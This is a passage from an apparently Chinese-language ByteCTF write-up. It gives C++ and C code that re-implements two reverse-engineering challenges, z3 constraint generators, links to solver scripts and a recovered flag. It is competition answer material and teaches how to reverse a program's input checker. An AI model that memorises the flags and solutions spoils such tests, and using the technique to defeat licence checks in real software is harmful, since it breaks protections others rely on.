    return 0;
}
#include<stdio.h>
#include<string.h>
#include<algorithm>
#include<iostream>
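#define MAXN 1000
using namespace std;
// Arbitrary-precision non-negative decimal integer ("high precision").
// s[0..len-1] holds one decimal digit per int, least-significant digit first.
// Capacity is fixed at MAXN digits: operator+ and operator* do not check for
// results that need more, so callers must stay within that bound.
struct HP
{
    int len,s[MAXN];
    // Zero value: a single digit 0.
    HP()
    {
        memset(s,0,sizeof(s));
        len=1;
    }
    // Assign from a decimal string (most-significant digit first).
    // Characters are not validated: anything outside '0'..'9' is stored as an
    // out-of-range digit. Returns a copy of the updated object.
    HP operator =(const char *num)
    {
        size_t total=strlen(num);
        // Never write past s: keep only the MAXN low-order digits of longer input.
        size_t digits=total<(size_t)MAXN?total:(size_t)MAXN;
        // Clear everything first; the converting constructors reach this point
        // without having zeroed s.
        memset(s,0,sizeof(s));
        for(size_t i=0;i<digits;i++) s[i]=num[total-1-i]-'0';
        len=digits?(int)digits:1; // "" is stored as 0
        clean();                   // drop leading zeros so "007" equals "7"
        return *this;              // was missing: falling off the end is undefined behaviour
    }
    // Assign from an int. Only num >= 0 is meaningful: the '-' of a negative
    // value would be stored as a digit.
    HP operator =(int num)
    {
        char buf[32]; // ample for the decimal form of an int, sign and NUL included
        snprintf(buf,sizeof(buf),"%d",num);
        *this=buf;
        return *this;
    }
    HP(int num) { *this=num;}
    HP(const char*num) {*this=num;}
    // Decimal representation, most-significant digit first.
    string str()const
    {
        string res(len,'0');
        for(int i=0;i<len;i++) res[len-1-i]=(char)(s[i]+'0');
        if(res=="") res="0";
        return res;
    }
    // Schoolbook addition; g is the carry.
    HP operator +(const HP& b) const
    {
        HP c;
        c.len=0;
        for(int i=0,g=0;g||i<max(len,b.len);i++)
        {
            int x=g;
            if(i<len) x+=s[i];
            if(i<b.len) x+=b.s[i];
            c.s[c.len++]=x%10;
            g=x/10;
        }
        return c;
    }
    // Strip leading zeros, always keeping at least one digit.
    void clean()
    {
        while(len > 1 && !s[len-1]) len--;
    }
    // Schoolbook multiplication. The caller must keep len+b.len <= MAXN.
    HP operator *(const HP& b) const
    {
        HP c;
        c.len=len+b.len;
        for(int i=0;i<len;i++)
            for(int j=0;j<b.len;j++)
                c.s[i+j]+=s[i]*b.s[j];
        // Single carry pass after all partial products have been accumulated.
        for(int i=0;i<c.len-1;i++)
        {
            c.s[i+1]+=c.s[i]/10;
            c.s[i]%=10;
        }
        c.clean();
        return c;
    }
    // Subtraction; g is the borrow. Assumes *this >= b (there is no sign).
    HP operator - (const HP& b) const
    {
        HP c;
        c.len = 0;
        for(int i=0,g=0;i<len;i++)
        {
            int x=s[i]-g;
            if(i<b.len) x-=b.s[i];
            if(x>=0)
                g=0;
            else
            {
                g=1;
                x+=10;
            }
            c.s[c.len++]=x;
        }
        c.clean();
        return c;
    }
    // Long division by repeated subtraction; f is the running remainder.
    // b must be non-zero, otherwise the inner loop never terminates.
    HP operator / (const HP &b) const
    {
        HP c, f = 0;
        for(int i = len-1; i >= 0; i--)
        {
            f = f*10;
            f.s[0] = s[i];
            while(f>=b)
            {
                f =f-b;
                c.s[i]++;
            }
        }
        c.len = len;
        c.clean();
        return c;
    }
    // Remainder, computed as *this - (*this / b) * b.
    HP operator % (const HP &b) const
    {
        HP r = *this / b;
        r = *this - r*b;
        return r;
    }
    HP operator /= (const HP &b)
    {
        *this = *this / b;
        return *this;
    }
    HP operator %= (const HP &b)
    {
        *this = *this % b;
        return *this;
    }
    // Ordering: more digits means larger, otherwise compare from the top digit
    // down. Relies on both operands having no leading zeros.
    bool operator < (const HP& b) const
    {
        if(len != b.len) return len < b.len;
        for(int i = len-1; i >= 0; i--)
            if(s[i] != b.s[i]) return s[i] < b.s[i];
        return false;
    }
    bool operator > (const HP& b) const
    {
        return b < *this;
    }
    bool operator <= (const HP& b) const
    {
        return !(b < *this);
    }
    bool operator == (const HP& b) const
    {
        return !(b < *this) && !(*this < b);
    }
    bool operator != (const HP &b) const
    {
        return !(*this == b);
    }
    HP operator += (const HP& b)
    {
        *this = *this + b;
        return *this;
    }
    bool operator >= (const HP &b) const
    {
        return *this > b || *this == b;
    }
};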
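// Stream extraction for HP: reads one whitespace-delimited token and stores it
// as the decimal digits of x.
// The token is external input, so it is checked before it reaches the fixed
// MAXN-digit array: a failed read, a token longer than MAXN characters or any
// character outside '0'..'9' leaves x untouched and sets failbit on the stream.
istream& operator >>(istream &in, HP& x)
{
    string token;
    if(!(in >> token)) return in; // nothing read: keep x as it was

    bool ok = token.size() <= (size_t)MAXN;
    for(size_t k = 0; ok && k < token.size(); k++)
        if(token[k] < '0' || token[k] > '9') ok = false;

    if(!ok)
    {
        in.setstate(ios::failbit);
        return in;
    }
    x = token.c_str();
    return in;
}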
// Stream insertion for HP: writes the decimal form produced by HP::str().
ostream& operator <<(ostream &out, const HP& x)
{
    const string digits = x.str();
    return out << digits;
}
// Working copy of the 25-element sequence; main fills it and reorders it in place.
int v3[25] = {0};
// Number of elements in v3.
int v5 = 25;
// Scan positions shared with main (names kept from the decompiler output).
int i;
int j;
// Running total of counted steps.
HP tot = 0;
// Factorial of n as an HP value: the product of 1..n, computed with an HP
// counter so that it never overflows a machine integer.
HP jc(int n)
{
    const HP limit = n;
    const HP one = 1;
    HP product = 1;
    HP k = 1;
    while(k <= limit)
    {
        product = product * k;
        k += one;
    }
    return product;
}
// Comparator for std::sort that yields descending order.
bool cmp(int a,int b)
{
    return b < a;
}
// Counts how many steps the challenge routine needs to take the second
// sequence to fully descending order, without replaying the steps one by one.
// Each pass applies the write-up's shortcut: when the tail after position i-1
// is already descending, fixing position i-1 costs
// (tail length)! * (number of tail elements greater than v3[i-1]).
int main()
{
    // Second of the two 25-element sequences built by the extracted routine.
    static const int start[25] = {
        5, 18, 14, 23, 11, 17, 12, 4, 25, 24, 1, 20, 19,
        15, 13, 10, 6, 21, 7, 22, 8, 3, 9, 2, 16
    };
    for (int idx = 0; idx < 25; ++idx)
        v3[idx] = start[idx];

    for (;;)
    {
        // Walk back from the end to the last position that is larger than its
        // predecessor; everything from that position on is non-increasing.
        i = v5 - 1;
        while (i > 0 && v3[i] <= v3[i - 1])
            --i;

        // No such position: the whole array is descending, nothing left to count.
        if (i <= 0)
            break;

        if (i != v5 - 1)
        {
            // Last tail element that is still greater than v3[i-1]; the tail is
            // descending, so j-i+1 elements are greater.
            j = v5 - 1;
            while (j >= i && v3[j] <= v3[i - 1])
                --j;

            const int now_n = v5 - i;
            const HP K = j - i + 1;
            tot += jc(now_n) * K;
            sort(v3 + i - 1, v3 + v5, cmp);
            printf("%d %d \n", i, j);
        }
        else
        {
            // Only the final pair is out of order: exactly one step.
            tot += 1LL;
            sort(v3 + i - 1, v3 + v5, cmp);
        }
    }

    cout << tot << endl;
    return 0;
}
两个输出求差的绝对值再转字符串就行,最后是大小端的问题需要把字符串倒序。
ByteCTF{Qw021zbG}
A Crack Me
动静结合理一下正向代码,并带入检验且检验成功,可以把原程序丢掉了
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * Constant material recovered from the target: 24 * 9 = 216 bytes.
 * The visible part of main XORs box[0..23] into the 24-byte state.
 * NOTE(review): how the remaining bytes are consumed is not visible here -
 * presumably one 24-byte slice per later round; confirm against the rest of main.
 */
unsigned char box[24 * 9] =
{
0x33, 0x37, 0x64, 0x35, 0x39, 0x66, 0x37, 0x61, 0x32, 0x66,
0x37, 0x64, 0x63, 0x34, 0x30, 0x63, 0x61, 0x30, 0x34, 0x61,
0x37, 0x62, 0x30, 0x73, 0x5F, 0x5F, 0xA9, 0x21, 0xFA, 0xED,
0xF1, 0x36, 0xA6, 0xCD, 0xD9, 0x87, 0x9D, 0x5A, 0x90, 0xD5,
0x0F, 0x71, 0x67, 0x0E, 0x37, 0xFF, 0xA1, 0x78, 0x58, 0x05,
0xFD, 0x07, 0x3A, 0xD8, 0x47, 0xBC, 0xD0, 0x04, 0x3E, 0x33,
0x08, 0x3E, 0xDD, 0x21, 0xB1, 0x71, 0xEB, 0x13, 0x53, 0x5E,
0x58, 0x05, 0x12, 0x23, 0x77, 0x00, 0x30, 0xCC, 0xA4, 0x2E,
0x66, 0x4B, 0xD0, 0x56, 0xC7, 0x7D, 0xE9, 0x44, 0x17, 0x76,
0x47, 0x8A, 0x18, 0x02, 0xD2, 0x26, 0x75, 0xCF, 0x1F, 0xB3,
0x5E, 0xD7, 0x28, 0x6A, 0x04, 0x7A, 0xEB, 0x61, 0x1F, 0x9F,
0x61, 0x9C, 0xA8, 0x25, 0x3C, 0x43, 0x6F, 0xCF, 0xD5, 0xAF,
0xB0, 0x92, 0xDC, 0xD3, 0x61, 0xE7, 0xA4, 0xAA, 0xC2, 0xC2,
0x3C, 0x57, 0xDD, 0x1A, 0xB3, 0x0B, 0x83, 0x55, 0x16, 0x88,
0x0D, 0xDD, 0x6E, 0x3D, 0x8F, 0x59, 0x49, 0xCD, 0x2C, 0x8D,
0x6E, 0x10, 0x6E, 0x53, 0xE5, 0xDA, 0xE2, 0x64, 0x68, 0xE8,
0x19, 0xA9, 0x60, 0x9C, 0xB5, 0xF2, 0x03, 0xFF, 0xC2, 0xB2,
0xCC, 0xF1, 0xB3, 0x9C, 0x4E, 0xA1, 0x77, 0xF0, 0xBA, 0x99,
0x36, 0xC0, 0x42, 0x71, 0xFC, 0x90, 0xBF, 0x72, 0x17, 0xD5,
0xCD, 0xDF, 0x73, 0xEA, 0x1C, 0xCC, 0x40, 0x9E, 0xCB, 0xAC,
0x4A, 0x82, 0x84, 0x35, 0x85, 0x97, 0xBE, 0xEA, 0x2E, 0x3A,
0x83, 0xEA, 0xC5, 0xF2, 0xC5, 0xE0};
/*
 * 64-entry substitution table. sub_7FF76BB31064 indexes it with each 6-bit
 * group of the state and writes the 6-bit result back in place.
 * The name is the decompiler's address-derived label.
 */
unsigned char byte_7FF76BB333A0[] =
{
0x00, 0x36, 0x30, 0x0D, 0x0F, 0x12, 0x35, 0x23, 0x19, 0x3F,
0x2D, 0x34, 0x03, 0x14, 0x29, 0x21, 0x3B, 0x24, 0x02, 0x22,
0x0A, 0x08, 0x39, 0x25, 0x3C, 0x13, 0x2A, 0x0E, 0x32, 0x1A,
0x3A, 0x18, 0x27, 0x1B, 0x15, 0x11, 0x10, 0x1D, 0x01, 0x3E,
0x2F, 0x28, 0x33, 0x38, 0x07, 0x2B, 0x2C, 0x26, 0x1F, 0x0B,
0x04, 0x1C, 0x3D, 0x2E, 0x05, 0x31, 0x09, 0x06, 0x17, 0x20,
0x1E, 0x0C, 0x37, 0x16};
// Substitution layer over a 24-byte (192-bit) state, rewritten in place.
// The state is read as 32 groups of 6 bits (most significant bit first); each
// group is used as an index into byte_7FF76BB333A0 and the low 6 bits of the
// table entry are written back to the same bit positions.
void sub_7FF76BB31064(char *a1)
{
    unsigned char out[24] = {0};
    for (int group = 0; group < 32; ++group)
    {
        int base = 6 * group;
        // Gather the six input bits of this group into a table index.
        unsigned char idx = 0;
        for (int t = 0; t < 6; ++t)
        {
            int pos = base + t;
            idx ^= ((a1[pos >> 3] >> (7 - (pos & 7))) & 1) << (5 - t);
        }
        unsigned char mapped = byte_7FF76BB333A0[idx];
        // Scatter the six substituted bits back to the same positions.
        for (int t = 0; t < 6; ++t)
        {
            int pos = base + t;
            out[pos >> 3] ^= ((mapped >> (5 - t)) & 1) << (7 - (pos & 7));
        }
    }
    memcpy(a1, out, 24);
}
// Bit-shuffling layer over a 24-byte (192-bit) state, rewritten in place.
// For every 6-bit group starting at bit `base`, output bit base + t receives
// input bit (base + 7 * t) % 192, for t = 0..5. Bits are numbered from the
// most significant bit of byte 0.
void sub_7FF76BB311B8(char *a1)
{
    unsigned char shuffled[24] = {0};
    for (int base = 0; base < 192; base += 6)
    {
        for (int t = 0; t < 6; ++t)
        {
            int dst = base + t;
            int src = (base + 7 * t) % 192;
            int bit = (a1[src >> 3] >> (7 - (src & 7))) & 1;
            shuffled[dst >> 3] ^= bit << (7 - (dst & 7));
        }
    }
    memcpy(a1, shuffled, 24);
}
// Print the 24 state bytes as unsigned decimal values, each followed by a comma.
void print_input(char *input)
{
    const unsigned char *bytes = (const unsigned char *)input;
    int idx = 0;
    while (idx < 24)
    {
        printf("%d,", bytes[idx]);
        ++idx;
    }
}
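// Forward re-implementation of the checker: runs the whole transform on a
// sample 24-byte input and compares the result with the expected bytes.
// Structure: S,P,S -> XOR box[0..23] -> 8 rounds of (S,P,S,P, 7-tap XOR mix,
// XOR with the next 24 bytes of box) -> S,P,S -> XOR sb -> compare,
// where S = sub_7FF76BB31064 and P = sub_7FF76BB311B8.
int main()
{
    char input[] = "123456789012345678901234";
    unsigned char sb[] = {0x11, 0xA1, 0x33, 0x03, 0x1B, 0xAB, 0x3B, 0xA3, 0x83, 0xB3, 0xA9, 0xA3, 0x81, 0xBB, 0x39, 0x13, 0x03, 0x3B, 0x19, 0x0B, 0x2D, 0x99, 0x21, 0x91};
    // Group offsets combined by the mixing step inside each round.
    const int v33[] = {0, 1, 5, 9, 0xF, 0x15, 0x1A};

    sub_7FF76BB31064(input);
    sub_7FF76BB311B8(input);
    sub_7FF76BB31064(input);
    for (int i = 0; i < 24; ++i)
    {
        input[i] ^= box[i];
    }

    for (int i = 0; i < 8; ++i)
    {
        sub_7FF76BB31064(input);
        sub_7FF76BB311B8(input);
        sub_7FF76BB31064(input);
        sub_7FF76BB311B8(input);

        // Mixing step: bit j of 6-bit group k becomes the XOR of bit j of the
        // seven groups (k + v33[z]) % 32.
        char v38[24] = {0};
        for (int k = 0; k < 32; ++k)
        {
            for (int j = 0; j < 6; ++j)
            {
                int dst = 6 * k + j;
                for (int z = 0; z < 7; ++z)
                {
                    int src = j + 6 * ((v33[z] + k) % 32);
                    v38[dst >> 3] ^= ((input[src >> 3] >> (7 - (src & 7))) & 1) << (7 - (dst & 7));
                }
            }
        }
        // Round i uses the 24-byte block of box starting at 24 + 24 * i.
        for (int k = 0; k < 24; ++k)
            input[k] = v38[k] ^ box[24 + k + 24 * i];
    }

    sub_7FF76BB31064(input);
    sub_7FF76BB311B8(input);
    sub_7FF76BB31064(input);
    for (int i = 0; i < 24; ++i)
    {
        input[i] ^= sb[i];
    }

    char cmp[] = {0xE4, 0xE1, 0x3E, 0x41, 0x25, 0x9D, 0x37, 0xC8, 0xFC, 0xDE, 0x92, 0x02, 0x3A, 0xBA, 0x61, 0x5F, 0xFA, 0x16, 0xA8, 0xC3, 0x20, 0x96, 0x14, 0x35};
    print_input(cmp);
    // Both buffers hold raw bytes, not C strings: memcmp compares all 24 bytes,
    // whereas strncmp would stop at the first NUL byte.
    if (!memcmp(input, cmp, 24))
        printf("success");
    return 0;
}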
然后分为sub_7FF76BB31064,sub_7FF76BB311B8,main内循环三个部分用z3求解
sub_7FF76BB31064部分:这里约束分为两个步骤 首先是求出v11,然后字典找到v13,最后求input
// 约束生成代码 1 output 到 v11
// look.c
#include <stdio.h>
#include <string.h>
// Constraint generator for the output half of the substitution layer.
// It walks the 32 six-bit groups and prints, as Python/z3 source text, how each
// output byte v17[n] is assembled from the bits of the substituted values
// v11[0..31]. v11 is all zero here, so the computed state is irrelevant: only
// the printed text matters, and a1 ends up overwritten with 24 zero bytes.
void sub_7FF76BB31064(char *a1)
{
    unsigned char v11[32] = {0};
    unsigned char v17[24] = {0};
    for (int group = 0; group < 32; ++group)
    {
        for (int t = 0; t < 6; ++t)
        {
            int pos = 6 * group + t;
            int shift = 5 - t;
            int bit = pos & 7;
            v17[pos >> 3] ^= ((v11[group] >> shift) & 1) << (7 - bit);
            // A new accumulator starts at the first bit of every output byte...
            if (bit == 0)
                printf("temp = 0\n");
            printf("temp ^= ((v11[%d] >> %d) & 1) << (7 - %d)\n", group, shift, bit);
            // ...and the constraint is emitted once its last bit has been added.
            if (bit == 7)
                printf("s.add(v17[%d] == temp)\n", pos >> 3);
        }
    }
    memcpy(a1, v17, 24);
}
// Dump the 24 state bytes as unsigned decimals, comma-terminated.
void print_input(char *input)
{
    const unsigned char *cursor = (const unsigned char *)input;
    const unsigned char *end = cursor + 24;
    for (; cursor != end; ++cursor)
    {
        printf("%d,", *cursor);
    }
}
// Runs the generator once; the z3 constraint text is written to stdout.
int main()
{
    // 24-byte placeholder state; its contents do not influence the printed text.
    char state[] = "123456789012345678901234";
    sub_7FF76BB31064(state);
    return 0;
}
// 约束生成代码2 v13到input
// look2.c
#include <stdio.h>
#include <string.h>
// 64-entry lookup table, indexed below with a value built from six input bits
// (so the index is always within 0..63).
unsigned char byte_7FF76BB333A0[] =
{
0x00, 0x36, 0x30, 0x0D, 0x0F, 0x12, 0x35, 0x23, 0x19, 0x3F,
0x2D, 0x34, 0x03, 0x14, 0x29, 0x21, 0x3B, 0x24, 0x02, 0x22,
0x0A, 0x08, 0x39, 0x25, 0x3C, 0x13, 0x2A, 0x0E, 0x32, 0x1A,
0x3A, 0x18, 0x27, 0x1B, 0x15, 0x11, 0x10, 0x1D, 0x01, 0x3E,
0x2F, 0x28, 0x33, 0x38, 0x07, 0x2B, 0x2C, 0x26, 0x1F, 0x0B,
0x04, 0x1C, 0x3D, 0x2E, 0x05, 0x31, 0x09, 0x06, 0x17, 0x20,
0x1E, 0x0C, 0x37, 0x16};
// Constraint generator for the input half of the substitution layer.
// For each of the 32 six-bit groups it prints, as Python/z3 source text, how
// the table index is assembled from the bits of a1 and ties it to find[group].
// The table lookup result is stored in v11 but never written to the state, so
// a1 is overwritten with 24 zero bytes; only the printed text is of interest.
void sub_7FF76BB31064(char *a1)
{
    unsigned char v11[32] = {0};
    unsigned char v17[24] = {0};
    int emitted = 0;
    for (int group = 0; group < 32; ++group)
    {
        unsigned char idx = 0;
        for (int t = 0; t < 6; ++t)
        {
            int pos = 6 * group + t;
            int shift = 5 - t;
            idx ^= ((a1[pos >> 3] >> (7 - (pos & 7))) & 1) << shift;
            // One accumulator per group of six printed terms.
            if (emitted % 6 == 0)
                printf("temp = 0\n");
            printf("temp ^= ((a1[%d] >> (7 - %d)) & 1) << %d\n", pos >> 3, pos & 7, shift);
            if (emitted % 6 == 5)
                printf("s.add(temp == find[%d])\n", group);
            emitted++;
        }
        v11[group] = byte_7FF76BB333A0[idx];
    }
    memcpy(a1, v17, 24);
}
// Runs the generator once; the z3 constraint text is written to stdout.
int main()
{
    // 24-byte placeholder state handed to the generator.
    char state[] = "123456789012345678901234";
    sub_7FF76BB31064(state);
    return 0;
}
z3 求解脚本:https://www.luogu.com.cn/paste/gdydaljf
(z3脚本太大 都以云剪贴板的形式提供,luogu应该不会崩)
sub_7FF76BB311B8部分:
// 约束代码生成
// look2.c
#include <stdio.h>
#include <string.h>
// Bit-shuffling layer with constraint generation.
// Applies the same mapping as the plain version (output bit base + t takes
// input bit (base + 7 * t) % 192) and additionally prints, as Python/z3 source
// text, one constraint per output byte v12[n] in terms of the bits of a1.
void sub_7FF76BB311B8(char *a1)
{
    unsigned char v12[24] = {0};
    int emitted = 0;
    for (int base = 0; base < 192; base += 6)
    {
        for (int t = 0; t < 6; ++t)
        {
            int dst = base + t;
            int src = (base + 7 * t) % 192;
            v12[dst >> 3] ^= ((a1[src >> 3] >> (7 - (src & 7))) & 1) << (7 - (dst & 7));
            // Output bits are produced in order, so every run of eight printed
            // terms corresponds to exactly one output byte.
            if (emitted % 8 == 0)
                printf("temp = 0\n");
            printf("temp ^= ((a1[%d] >> (7 - %d)) & 1) << (7 - %d)\n", src >> 3, src & 7, dst & 7);
            if (emitted % 8 == 7)
                printf("s.add(temp == v12[%d])\n", dst >> 3);
            emitted++;
        }
    }
    memcpy(a1, v12, 24);
}
// Print the 24 state bytes as unsigned decimal values, each followed by a comma.
void print_input(char *input)
{
    const unsigned char *bytes = (const unsigned char *)input;
    int idx = 0;
    while (idx < 24)
    {
        printf("%d,", bytes[idx]);
        ++idx;
    }
}
// Prints the z3 constraint text, then the shuffled sample state.
int main()
{
    char state[] = "123456789012345678901234";
    sub_7FF76BB311B8(state);
    print_input(state);
    return 0;
}
z3约束脚本:https://www.luogu.com.cn/paste/k58tlpv9
main内循环部分:
// 约束代码生成
// look4.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
// 24 * 9 = 216 constant bytes copied from the forward re-implementation.
// NOTE(review): nothing in this listing reads box - the generator below only
// prints the constraints of the mixing step - so it looks like a leftover.
unsigned char box[24 * 9] =
{
0x33, 0x37, 0x64, 0x35, 0x39, 0x66, 0x37, 0x61, 0x32, 0x66,
0x37, 0x64, 0x63, 0x34, 0x30, 0x63, 0x61, 0x30, 0x34, 0x61,
0x37, 0x62, 0x30, 0x73, 0x5F, 0x5F, 0xA9, 0x21, 0xFA, 0xED,
0xF1, 0x36, 0xA6, 0xCD, 0xD9, 0x87, 0x9D, 0x5A, 0x90, 0xD5,
0x0F, 0x71, 0x67, 0x0E, 0x37, 0xFF, 0xA1, 0x78, 0x58, 0x05,
0xFD, 0x07, 0x3A, 0xD8, 0x47, 0xBC, 0xD0, 0x04, 0x3E, 0x33,
0x08, 0x3E, 0xDD, 0x21, 0xB1, 0x71, 0xEB, 0x13, 0x53, 0x5E,
0x58, 0x05, 0x12, 0x23, 0x77, 0x00, 0x30, 0xCC, 0xA4, 0x2E,
0x66, 0x4B, 0xD0, 0x56, 0xC7, 0x7D, 0xE9, 0x44, 0x17, 0x76,
0x47, 0x8A, 0x18, 0x02, 0xD2, 0x26, 0x75, 0xCF, 0x1F, 0xB3,
0x5E, 0xD7, 0x28, 0x6A, 0x04, 0x7A, 0xEB, 0x61, 0x1F, 0x9F,
0x61, 0x9C, 0xA8, 0x25, 0x3C, 0x43, 0x6F, 0xCF, 0xD5, 0xAF,
0xB0, 0x92, 0xDC, 0xD3, 0x61, 0xE7, 0xA4, 0xAA, 0xC2, 0xC2,
0x3C, 0x57, 0xDD, 0x1A, 0xB3, 0x0B, 0x83, 0x55, 0x16, 0x88,
0x0D, 0xDD, 0x6E, 0x3D, 0x8F, 0x59, 0x49, 0xCD, 0x2C, 0x8D,
0x6E, 0x10, 0x6E, 0x53, 0xE5, 0xDA, 0xE2, 0x64, 0x68, 0xE8,
0x19, 0xA9, 0x60, 0x9C, 0xB5, 0xF2, 0x03, 0xFF, 0xC2, 0xB2,
0xCC, 0xF1, 0xB3, 0x9C, 0x4E, 0xA1, 0x77, 0xF0, 0xBA, 0x99,
0x36, 0xC0, 0x42, 0x71, 0xFC, 0x90, 0xBF, 0x72, 0x17, 0xD5,
0xCD, 0xDF, 0x73, 0xEA, 0x1C, 0xCC, 0x40, 0x9E, 0xCB, 0xAC,
0x4A, 0x82, 0x84, 0x35, 0x85, 0x97, 0xBE, 0xEA, 0x2E, 0x3A,
0x83, 0xEA, 0xC5, 0xF2, 0xC5, 0xE0};
// 64-entry lookup table, indexed by sub_7FF76BB31064() with a 6-bit value.
unsigned char byte_7FF76BB333A0[] =
{
0x00, 0x36, 0x30, 0x0D, 0x0F, 0x12, 0x35, 0x23, 0x19, 0x3F,
0x2D, 0x34, 0x03, 0x14, 0x29, 0x21, 0x3B, 0x24, 0x02, 0x22,
0x0A, 0x08, 0x39, 0x25, 0x3C, 0x13, 0x2A, 0x0E, 0x32, 0x1A,
0x3A, 0x18, 0x27, 0x1B, 0x15, 0x11, 0x10, 0x1D, 0x01, 0x3E,
0x2F, 0x28, 0x33, 0x38, 0x07, 0x2B, 0x2C, 0x26, 0x1F, 0x0B,
0x04, 0x1C, 0x3D, 0x2E, 0x05, 0x31, 0x09, 0x06, 0x17, 0x20,
0x1E, 0x0C, 0x37, 0x16};
// Substitution layer over a 24-byte (192-bit) state, rewritten in place:
// each of the 32 six-bit groups (most significant bit first) is replaced by
// the low 6 bits of byte_7FF76BB333A0[group value].
void sub_7FF76BB31064(char *a1)
{
    unsigned char out[24] = {0};
    for (int group = 0; group < 32; ++group)
    {
        int first = 6 * group;
        int last = first + 5;
        // Read the group, first bit landing in bit 5 of the index.
        unsigned char idx = 0;
        for (int pos = first; pos <= last; ++pos)
        {
            idx ^= ((a1[pos >> 3] >> (7 - (pos & 7))) & 1) << (last - pos);
        }
        unsigned char mapped = byte_7FF76BB333A0[idx];
        // Write the substituted group back to the same bit positions.
        for (int pos = first; pos <= last; ++pos)
        {
            out[pos >> 3] ^= ((mapped >> (last - pos)) & 1) << (7 - (pos & 7));
        }
    }
    memcpy(a1, out, 24);
}
// Bit-shuffling layer over a 24-byte (192-bit) state, rewritten in place.
// Output bit number d = base + t (base a multiple of 6, t = 0..5) is copied
// from input bit (base + 7 * t) % 192; bit 0 is the top bit of byte 0.
void sub_7FF76BB311B8(char *a1)
{
    unsigned char shuffled[24] = {0};
    for (int dst = 0; dst < 192; ++dst)
    {
        int t = dst % 6;
        int base = dst - t;
        int src = (base + 7 * t) % 192;
        int bit = (a1[src >> 3] >> (7 - (src & 7))) & 1;
        shuffled[dst >> 3] ^= bit << (7 - (dst & 7));
    }
    memcpy(a1, shuffled, 24);
}
// Dump the 24 state bytes as unsigned decimals, comma-terminated.
void print_input(char *input)
{
    const unsigned char *cursor = (const unsigned char *)input;
    const unsigned char *end = cursor + 24;
    for (; cursor != end; ++cursor)
    {
        printf("%d,", *cursor);
    }
}
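// Constraint generator for the mixing step of one round.
// Bit j of 6-bit group k of the output is the XOR of bit j of the seven input
// groups (k + v33[z]) % 32. For every output byte the program prints 56 terms
// (8 bits x 7 taps) as Python/z3 source text followed by the constraint
// "s.add(temp == v38[n])", then prints the mixed sample state.
int main()
{
    char input[] = "123456789012345678901234";
    // Group offsets combined by the mixing step.
    const int v33[] = {0, 1, 5, 9, 0xF, 0x15, 0x1A};
    int tot = 0;
    for (int i = 0; i < 1; ++i) // a single round is enough to derive the constraints
    {
        char v38[24] = {0};
        for (int k = 0; k < 32; ++k)
        {
            for (int j = 0; j < 6; ++j)
            {
                int dst = 6 * k + j;
                int v23 = dst >> 3;
                int v24 = 7 - (dst & 7);
                for (int z = 0; z < 7; ++z)
                {
                    int src = j + 6 * ((v33[z] + k) % 32);
                    int v27 = src & 7;
                    v38[v23] ^= ((input[src >> 3] >> (7 - v27)) & 1) << v24;
                    if (tot % 56 == 0)
                        printf("temp = 0\n");
                    printf("temp ^= ((input[%d] >> (7 - %d)) & 1) << %d\n", src >> 3, v27, v24);
                    if (tot % 56 == 55)
                        printf("s.add(temp == v38[%d])\n", v23);
                    tot++;
                }
            }
        }
        // v38 holds 24 raw bytes with no terminating NUL. strcpy would either
        // stop early at an embedded zero byte or read past the end of v38, so
        // copy the fixed length instead.
        memcpy(input, v38, sizeof v38);
    }
    print_input(input);
    return 0;
}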
z3约束脚本:https://www.luogu.com.cn/paste/emlw2khc
然后其中两次异或的值都可以动调调试出来(前面的复现源码已经提供)
之后再逆向分别调用脚本并且异或得出flag
from z3 import *
import os
# 24-byte mask XORed onto the state in the last step of the forward program;
# the driver below removes it first.
sb = [0x11, 0xA1, 0x33, 0x03, 0x1B, 0xAB, 0x3B, 0xA3, 0x83, 0xB3, 0xA9, 0xA3, 0x81, 0xBB, 0x39, 0x13, 0x03, 0x3B, 0x19, 0x0B, 0x2D, 0x99, 0x21, 0x91]
# 216 constant bytes used as nine 24-byte blocks: box[0:24] for the initial XOR
# and box[24 + 24*i : 48 + 24*i] for round i.
box = [0x33, 0x37, 0x64, 0x35, 0x39, 0x66, 0x37, 0x61, 0x32, 0x66,
0x37, 0x64, 0x63, 0x34, 0x30, 0x63, 0x61, 0x30, 0x34, 0x61,
0x37, 0x62, 0x30, 0x73, 0x5F, 0x5F, 0xA9, 0x21, 0xFA, 0xED,
0xF1, 0x36, 0xA6, 0xCD, 0xD9, 0x87, 0x9D, 0x5A, 0x90, 0xD5,
0x0F, 0x71, 0x67, 0x0E, 0x37, 0xFF, 0xA1, 0x78, 0x58, 0x05,
0xFD, 0x07, 0x3A, 0xD8, 0x47, 0xBC, 0xD0, 0x04, 0x3E, 0x33,
0x08, 0x3E, 0xDD, 0x21, 0xB1, 0x71, 0xEB, 0x13, 0x53, 0x5E,
0x58, 0x05, 0x12, 0x23, 0x77, 0x00, 0x30, 0xCC, 0xA4, 0x2E,
0x66, 0x4B, 0xD0, 0x56, 0xC7, 0x7D, 0xE9, 0x44, 0x17, 0x76,
0x47, 0x8A, 0x18, 0x02, 0xD2, 0x26, 0x75, 0xCF, 0x1F, 0xB3,
0x5E, 0xD7, 0x28, 0x6A, 0x04, 0x7A, 0xEB, 0x61, 0x1F, 0x9F,
0x61, 0x9C, 0xA8, 0x25, 0x3C, 0x43, 0x6F, 0xCF, 0xD5, 0xAF,
0xB0, 0x92, 0xDC, 0xD3, 0x61, 0xE7, 0xA4, 0xAA, 0xC2, 0xC2,
0x3C, 0x57, 0xDD, 0x1A, 0xB3, 0x0B, 0x83, 0x55, 0x16, 0x88,
0x0D, 0xDD, 0x6E, 0x3D, 0x8F, 0x59, 0x49, 0xCD, 0x2C, 0x8D,
0x6E, 0x10, 0x6E, 0x53, 0xE5, 0xDA, 0xE2, 0x64, 0x68, 0xE8,
0x19, 0xA9, 0x60, 0x9C, 0xB5, 0xF2, 0x03, 0xFF, 0xC2, 0xB2,
0xCC, 0xF1, 0xB3, 0x9C, 0x4E, 0xA1, 0x77, 0xF0, 0xBA, 0x99,
0x36, 0xC0, 0x42, 0x71, 0xFC, 0x90, 0xBF, 0x72, 0x17, 0xD5,
0xCD, 0xDF, 0x73, 0xEA, 0x1C, 0xCC, 0x40, 0x9E, 0xCB, 0xAC,
0x4A, 0x82, 0x84, 0x35, 0x85, 0x97, 0xBE, 0xEA, 0x2E, 0x3A,
0x83, 0xEA, 0xC5, 0xF2, 0xC5, 0xE0]
# Working lists; the trailing comment holds the expected comparison bytes in
# decimal (the same values as cmp[] in the C re-implementation).
